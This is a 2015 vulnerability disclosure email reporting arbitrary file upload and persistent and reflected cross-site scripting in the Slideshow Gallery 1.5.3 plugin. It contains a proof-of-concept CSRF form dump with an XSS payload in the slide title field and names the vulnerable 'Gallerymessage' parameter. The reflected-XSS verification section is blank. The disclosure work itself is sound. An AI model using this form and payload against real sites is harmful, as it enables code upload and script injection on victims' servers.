Subject: Arbitrary file upload and Cross-Site Scripting (XSS) in Slideshow Gallery 1.5.3
Date: Thu, 20 Aug 2015 11:03:00 +0200Hello,
1. Arbitrary file upload + persistent Cross-Site Scripting (XSS)
Authenticated administrators can upload arbitrary files (resulting in remote code execution) and store html/js codes (there is no CSRF protection).
Method: POST
Example PHP Callstack:
GallerySlide::validate [/slideshow-gallery/models/slide.php:178]
Verification (phpinfo.php upload):
--
<!-- arbitrary file url -->
<!-- other params (form dumped) -->
<input type="hidden" name="Slide[id]" value="1">
<input type="hidden" name="Slide[order]" value="0">
<input value="XXXX <img src=x onerror=alert(1) />" name="Slide[title]">
<textarea name="Slide[description]">11111</textarea>
<input checked="checked" type="radio" name="Slide[showinfo]" value="both">
<input type="radio" name="Slide[showinfo]" value="title">
<input type="radio" name="Slide[showinfo]" value="description">
<input type="radio" name="Slide[showinfo]" value="none">
<input type="text" name="Slide[iopacity]" value="70">
<input checked="checked" type="checkbox" name="Slide[galleries][]" value="1">
<input type="hidden" name="Slide[type]" value="url" >
<input type="button" name="Slide_mediaupload" value="Choose File">
<input type="hidden" name="Slide[attachment_id]" value="12">
<input type="file" name="image_file" value="">
<input type="radio" name="Slide[uselink]" value="Y">
<input checked="checked" type="radio" name="Slide[uselink]" value="N">
<input type="text" name="Slide[link]" value="">
<input checked="checked" type="radio" name="Slide[linktarget]" value="self">
<input type="radio" name="Slide[linktarget]" value="blank">
<input type="submit">
</form>
--
Same code contains Cross-Site Scripting (Slide[title]).
2. Reflected Cross-Site Scripting XSS
Authenticated administrators can inject html/js code (there is no CSRF protection).
Method: GET
Vulnerable parameter: Gallerymessage
Verification:
--
Regards,
Marcin Probola,
